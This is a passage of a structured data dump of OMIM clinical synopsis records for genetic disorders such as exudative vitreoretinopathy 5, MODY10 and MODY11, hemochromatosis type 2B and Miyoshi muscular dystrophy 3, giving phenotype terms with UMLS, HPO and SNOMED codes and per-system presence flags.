'cardiovascularVascular': 'Patent ductus arteriosus (in some patients) {UMLS C3280787} {HPO HP:0001643 C0013274}',
'respiratory': 'Respiratory difficulties (in some patients) {UMLS C4227383} {HPO HP:0002098 C0013404,C0476273}',
'chestDiaphragm': 'Diaphragmatic hernia (in some patients) {UMLS C3278412} {HPO HP:0000776 C0235833}',
'genitourinaryKidneys': '''Duplicated kidney (in some patients) {UMLS C4229858};\nRenal ectopia (in some patients) {UMLS C4229857} {HPO HP:0000086 C0238207}''',
'hematology': '''Macrocytic anemia {SNOMEDCT:83414005} {UMLS C1420653,C0002886 HP:0001972} {HPO HP:0001972 C0002886};\nIncreased fetal hemoglobin {UMLS C0239941 HP:0011904};\nIncreased erythrocyte adenosine deaminase activity {UMLS C4230444};\nReticulocytopenia {SNOMEDCT:124961001} {UMLS C0858867 HP:0001896} {HPO HP:0001896 C0858867};\nBone marrow shows decreased erythroid progenitors {UMLS C4229851}''',
'miscellaneous': '''Onset in infancy {UMLS C1848924 HP:0003593} {HPO HP:0003593 C1848924};\nVariable expressivity, even within families {UMLS C4229849}''',
'molecularBasis': 'Caused by mutation in the ribosomal protein S26 gene (RPS26, {603701.0001})',
'inheritanceExists': True,
'growthExists': True,
'growthHeightExists': True,
'growthWeightExists': False,
'growthOtherExists': True,
'headAndNeckExists': True,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': True,
'headAndNeckEarsExists': True,
'headAndNeckEyesExists': False,
'headAndNeckNoseExists': True,
'headAndNeckMouthExists': True,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': True,
'cardiovascularExists': True,
'cardiovascularHeartExists': True,
'cardiovascularVascularExists': True,
'respiratoryExists': True,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': True,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': True,
'abdomenExists': False,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': True,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': True,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': False,
'neurologicExists': False,
'neurologicCentralNervousSystemExists': False,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': True,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 613310,
'prefix': '#',
'preferredTitle': 'EXUDATIVE VITREORETINOPATHY 5; EVR5',
'inheritance': 'Autosomal dominant {SNOMEDCT:263681008} {UMLS C0443147 HP:0000006} {HPO HP:0000006 C0443147}',
'headAndNeckEyes': '''Avascularity of peripheral retina {UMLS C3808307};\nRetinal exudates {SNOMEDCT:39832008} {UMLS C0240897 HP:0001147} {HPO HP:0001147 C0240897};\nDecreased visual acuity (in some patients) {UMLS C3554187} {HPO HP:0007663 C0234632};\nTractional retinal detachment (in some patients) {UMLS C3808308} {HPO HP:0007917 C1866178};\nShallow anterior chamber (in some patients) {UMLS C3808309} {HPO HP:0000594 C0423276};\nNasally displaced pupils (in some patients) {UMLS C3808310};\nAbnormal vascularization of the iris on indocyanine green angiography (in some patients) {UMLS C3808311}''',
'miscellaneous': '''Visual acuity varies considerably, depending on the presence of secondary defects such as retinal exudates or detachment {UMLS C3808313};\nSeverely affected individuals may carry 2 mutated alleles {UMLS C3808314}''',
'molecularBasis': 'Caused by mutation in the tetraspanin-12 gene (TSPAN12, {613138.0001})',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': True,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': True,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': False,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': False,
'neurologicExists': False,
'neurologicCentralNervousSystemExists': False,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 613370,
'prefix': '#',
'preferredTitle': 'MATURITY-ONSET DIABETES OF THE YOUNG, TYPE 10; MODY10',
'inheritance': 'Autosomal dominant {SNOMEDCT:263681008} {UMLS C0443147 HP:0000006} {HPO HP:0000006 C0443147}',
'endocrineFeatures': 'Diabetes mellitus {SNOMEDCT:73211009} {ICD10CM:E08-E13} {ICD9CM:250} {UMLS C0011849 HP:0000819} {HPO HP:0000819 C0011849}',
'miscellaneous': '''Diagnosed in second or third decade of life {UMLS C3278782};\nOccasionally low-dose insulin required {UMLS C3278783}''',
'molecularBasis': 'Caused by mutation in the insulin gene (INS, {176730.0014})',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': False,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': False,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': False,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': False,
'neurologicExists': False,
'neurologicCentralNervousSystemExists': False,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': True,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 613312,
'prefix': '#',
'preferredTitle': 'HYPOPHOSPHATEMIC RICKETS, AUTOSOMAL RECESSIVE, 2; ARHR2',
'inheritance': 'Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899}',
'growthHeight': 'Short stature {SNOMEDCT:422065006,237837007,237836003} {ICD10CM:R62.52,E34.3} {ICD9CM:783.43} {UMLS C0013336,C0349588,C2237041,C2919142 HP:0004322,HP:0003510} {HPO HP:0004322 C0349588}',
'headAndNeckTeeth': '''Hypoplastic teeth (in 1 patient) {UMLS C4747623} {HPO HP:0000685 C0235357,C4280611};\nDental caries (rare) {UMLS C4747624} {HPO HP:0000670 C0011334,C4280623}''',
'cardiovascularHeart': 'Thickening of aortic valves (in 1 patient) {UMLS C4747633}',
'cardiovascularVascular': '''Aortic root dissection (in 1 patient) {UMLS C4747634};\nPulmonary stenosis, mild (in 1 patient) {UMLS C4747635} {HPO HP:0001642 C1956257}''',
'genitourinaryKidneys': 'Medullary nephrocalcinosis (in 1 patient) {UMLS C4747622} {HPO HP:0012408 C0403477}',
'skeletal': 'Delayed bone age {SNOMEDCT:123983008} {UMLS C0541764 HP:0002750} {HPO HP:0002750 C0541764}',
'skeletalPelvis': 'Coxa valga (in 1 patient) {UMLS C4313573} {HPO HP:0002673 C0239137,C3549698}',
'skeletalLimbs': '''Slight widening of the wrist {UMLS C4747625};\nWidening of growth pate of radius {UMLS C4747626};\nWidening of growth plate of ulna {UMLS C4747627};\nCupping of growth plate of radius {UMLS C4747628};\nCupping of growth plate of ulna {UMLS C4747629};\nBowing of femur {UMLS C1859461 HP:0002980};\nGenu valgum {SNOMEDCT:52012001,299330008} {ICD10CM:M21.06} {ICD9CM:736.41} {UMLS C0576093,C0158484 HP:0002857} {HPO HP:0002857 C0576093};\nGenu varum {SNOMEDCT:64925008,299331007} {ICD10CM:M21.16} {ICD9CM:736.42} {UMLS C0158485,C0544755 HP:0002970,HP:0002979} {HPO HP:0002970 C0544755};\nBowing of tibia {UMLS C1837081 HP:0002982}''',
'laboratoryAbnormalities': '''Hypophosphatemia {SNOMEDCT:4996001} {UMLS C0595888,C0085682,C4554637 HP:0002148} {HPO HP:0002148 C0085682};\nHyperphosphaturia {SNOMEDCT:85487008,22450000} {UMLS C0268079,C0282201,C0948023 HP:0003109} {HPO HP:0003109 C0268079,C0948023};\nElevated plasma alkaline phosphatase {UMLS C4747630};\nNormal calcium level {UMLS C0860970};\nNormal calcium excretion {UMLS C4747631};\nNormal PTH {UMLS C0858303};\nNormal vitamin D metabolites {UMLS C4747632}''',
'miscellaneous': '''Normal renal function {SNOMEDCT:81141003} {UMLS C0232805};\nNo vascular or periarticular calcifications {UMLS C4747637}''',
'molecularBasis': 'Caused by mutation in the ectonucleotide pyrophosphatase/phosphodiesterase-1 gene (ENPP1, {173335.0010})',
'inheritanceExists': True,
'growthExists': True,
'growthHeightExists': True,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': True,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': False,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': True,
'headAndNeckNeckExists': False,
'cardiovascularExists': True,
'cardiovascularHeartExists': True,
'cardiovascularVascularExists': True,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': False,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': True,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': True,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': True,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': True,
'skeletalLimbsExists': True,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': False,
'neurologicExists': False,
'neurologicCentralNervousSystemExists': False,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': True,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 613371,
'prefix': '%',
'preferredTitle': 'SPINOCEREBELLAR ATAXIA 30; SCA30',
'inheritance': 'Autosomal dominant {SNOMEDCT:263681008} {UMLS C0443147 HP:0000006} {HPO HP:0000006 C0443147}',
'headAndNeckEyes': '''Hypermetric saccades {SNOMEDCT:246769000} {UMLS C0423083 HP:0007338} {HPO HP:0007338 C0423083};\nGaze-evoked nystagmus (1 patient) {UMLS C3278786} {HPO HP:0000640 C0271390}''',
'neurologicCentralNervousSystem': '''Ataxia, gait and appendicular {UMLS C3278784};\nDysarthria {SNOMEDCT:8011004} {ICD9CM:438.13,784.51} {UMLS C0013362,C4553903 HP:0001260} {HPO HP:0001260 C0013362};\nHyperreflexia, lower limbs, mild {UMLS C3278785};\nCerebellar atrophy {UMLS C0740279 HP:0001272} {HPO HP:0001272 C0262404,C0740279,C4020873}''',
'miscellaneous': '''Adult onset (45 to 76 years) {UMLS C3278787} {HPO HP:0003581 C1853562};\nInsidious onset {SNOMEDCT:367326009} {UMLS C1298634 HP:0003587} {HPO HP:0003587 C0332164,C1298634};\nSlow progression {UMLS C1854494 HP:0003677} {HPO HP:0003677 C1854494};\nOne family has been reported (as of 4/2010) {UMLS C3278788}''',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': True,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': True,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': False,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': False,
'neurologicExists': True,
'neurologicCentralNervousSystemExists': True,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': False,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 613313,
'prefix': '#',
'preferredTitle': 'HEMOCHROMATOSIS, TYPE 2B; HFE2B',
'inheritance': 'Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899}',
'cardiovascularHeart': '''Heart failure {SNOMEDCT:84114007,42343007} {ICD10CM:I50,I50.9} {ICD9CM:428,428.9,428.0} {UMLS C0018801,C0018802,C4554158 HP:0001635} {HPO HP:0001635 C0018801,C0018802};\nCardiomyopathy {SNOMEDCT:57809008,85898001} {ICD10CM:I42,I51.5,I42.9} {ICD9CM:425} {UMLS C0878544 HP:0001638} {HPO HP:0001638 C0878544}''',
'abdomenLiver': '''Fibrosis {SNOMEDCT:263756000,112674009} {UMLS C0016059,C4285457};\nCirrhosis {SNOMEDCT:19943007} {ICD10CM:K74.60} {UMLS C1623038,C0023890 HP:0001394} {HPO HP:0001394 C0023890};\nHepatomegaly {SNOMEDCT:80515008} {ICD10CM:R16.0} {ICD9CM:789.1} {UMLS C0019209 HP:0002240} {HPO HP:0002240 C0019209}''',
'abdomenSpleen': 'Splenomegaly {SNOMEDCT:16294009} {ICD10CM:R16.1} {ICD9CM:789.2} {UMLS C0038002 HP:0001744} {HPO HP:0001744 C0038002}',
'genitourinaryExternalGenitaliaMale': 'Hypogonadism {SNOMEDCT:48130008} {UMLS C0020619 HP:0000135} {HPO HP:0000135 C0020619}',
'genitourinaryExternalGenitaliaFemale': 'Hypogonadism {SNOMEDCT:48130008} {UMLS C0020619 HP:0000135} {HPO HP:0000135 C0020619}',
'skinNailsHairSkin': 'Hyperpigmentation {SNOMEDCT:4830009,49765009} {UMLS C1962962,C0162834 HP:0000953}',
'hematology': 'Anemia {SNOMEDCT:271737000} {ICD10CM:D64.9} {ICD9CM:285.9} {UMLS C0002871,C4554633,C1000483 HP:0001903} {HPO HP:0001903 C0002871,C0162119}',
'laboratoryAbnormalities': '''Increased serum iron {SNOMEDCT:165624002} {UMLS C0151900 HP:0003452} {HPO HP:0003452 C0151900};\nIncreased serum ferritin {UMLS C0241013 HP:0003281} {HPO HP:0003281 C0241013,C0743912,C3854388};\nIncreased transaminases {UMLS C0438717 HP:0002910} {HPO HP:0002910 C0086565,C0151766,C0235996,C0438237,C0438717,C0877359,C1842003,C1848701};\nIncreased or complete (100%) transferrin saturation {UMLS C4478919}''',
'miscellaneous': 'Onset is usually before 30 years of age {UMLS C4478921}',
'molecularBasis': 'Caused by mutation in the hepcidin antimicrobial peptide gene (HAMP, {606464.0001})',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': False,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': False,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': True,
'cardiovascularHeartExists': True,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': True,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': True,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': True,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': True,
'genitourinaryExternalGenitaliaMaleExists': True,
'genitourinaryExternalGenitaliaFemaleExists': True,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': True,
'skinNailsHairSkinExists': True,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': False,
'neurologicExists': False,
'neurologicCentralNervousSystemExists': False,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': True,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': True,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 613375,
'prefix': '#',
'preferredTitle': 'MATURITY-ONSET DIABETES OF THE YOUNG, TYPE 11; MODY11',
'inheritance': 'Autosomal dominant {SNOMEDCT:263681008} {UMLS C0443147 HP:0000006} {HPO HP:0000006 C0443147}',
'growthWeight': '''Overweight {SNOMEDCT:238131007} {ICD10CM:E66.3} {ICD9CM:278.02} {UMLS C0497406 HP:0025502} {HPO HP:0025502};\nObesity {SNOMEDCT:414915002,414916001} {ICD10CM:E66.9} {ICD9CM:278.00} {UMLS C1963185,C0028754 HP:0001513} {HPO HP:0001513 C0028754}''',
'endocrineFeatures': 'Diabetes mellitus {SNOMEDCT:73211009} {ICD10CM:E08-E13} {ICD9CM:250} {UMLS C0011849 HP:0000819} {HPO HP:0000819 C0011849}',
'miscellaneous': 'Some patients require insulin for treatment {UMLS C3278790}',
'molecularBasis': 'Caused by mutation in the BLK nonreceptor tyrosine kinase gene (BLK, {191305.0001})',
'inheritanceExists': True,
'growthExists': True,
'growthHeightExists': False,
'growthWeightExists': True,
'growthOtherExists': False,
'headAndNeckExists': False,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': False,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': False,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': False,
'neurologicExists': False,
'neurologicCentralNervousSystemExists': False,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': True,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 613319,
'prefix': '#',
'preferredTitle': 'MIYOSHI MUSCULAR DYSTROPHY 3; MMD3',
'inheritance': 'Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899}',
'muscleSoftTissue': '''Distal muscle weakness {SNOMEDCT:249942005} {UMLS C0427065 HP:0002460} {HPO HP:0002460 C0427065,C1864696};\nInability to stand on tiptoes {UMLS C3150479};\nCalf muscle discomfort {UMLS C3150480};\nCalf muscle weakness {SNOMEDCT:309249007} {UMLS C0586738};\nCalf hypertrophy (early in the disease) {UMLS C3150481} {HPO HP:0008981 C1843057};\nCalf atrophy (later onset) {UMLS C3150482};\nHypertrophy of the extensor digitorum brevis muscles {UMLS C3150483};\nMRI shows fatty infiltration of affected muscles {UMLS C1864710};\nDifficulty running {SNOMEDCT:282479002} {UMLS C0560346 HP:0009046} {HPO HP:0009046 C0560346};\nDifficulty climbing stairs {SNOMEDCT:282195009} {UMLS C0239067 HP:0003551} {HPO HP:0003551 C0239067};\nDifficulty rising from chair {UMLS C3150484};\nProximal lower limb muscle weakness, upper and lower (later onset) {UMLS C3150485};\nQuadriceps atrophy (later onset) {UMLS C3150486};\nMuscle weakness and atrophy may be asymmetric {UMLS C3150487};\nDisruption of the sarcolemmal membrane seen on muscle biopsy {UMLS C3552741}''',
'laboratoryAbnormalities': 'Increased serum creatine kinase {UMLS C0241005 HP:0003236} {HPO HP:0003236 C0151576,C0241005}',
